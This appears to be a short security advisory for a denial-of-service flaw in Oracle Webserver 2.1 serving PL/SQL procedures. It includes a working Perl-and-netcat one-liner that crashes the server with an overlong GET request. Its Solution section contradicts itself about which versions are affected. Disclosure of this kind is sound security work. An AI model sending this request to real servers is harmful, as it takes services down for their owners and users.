Vulnerability

    Oracle Webserver

Affected

    Systems running Oracle Webserver 2.1 with PL/SQL stored procedures

Description

    This is a  DoS-attack against a  Oracle Webserver 2.1  that serves
    PL/SQL  stored  procedures.   The  server  dumps  quietly,   Simon
    Josefsson haven't found anything  in the logs (he  reported this).
    v2.0 does not seem to exhibit this behaviour (v2.1 is the  latest,
    but many sites seem to still run v2.0).  PL/SQL is, simply put,  a
    scripting language within the Oracle database.

    ---
    #!/bin/sh
    #
    # requires Perl and NetCat.
    #
    # usage:
    #       prg <host> <port> <path>
    #
    # example:
    #       # ./prg your.own.domain.com 80 /ows-bin
    #
    # if you have the PL/SQL stored procedure in /ows-bin/.
    #
    perl -e 'print "GET $ARGV[0]/fnord?foo=", "a" x 2600, " HTTP/1.0\n\n\n\n";' "$3"|nc $1 $2

Solution

    Nothing yet.   v2.0 and  after does  not seems  to be  affected by
    this.  The old Oracle Webserver 1.0.2.0.2 cannot be attacked  this
    way. There seem to be  hard limits of 32 lines  HTTP-Request, 1540
    chars on the GET/HEAD statement and 4096 chars on every additional
    header line.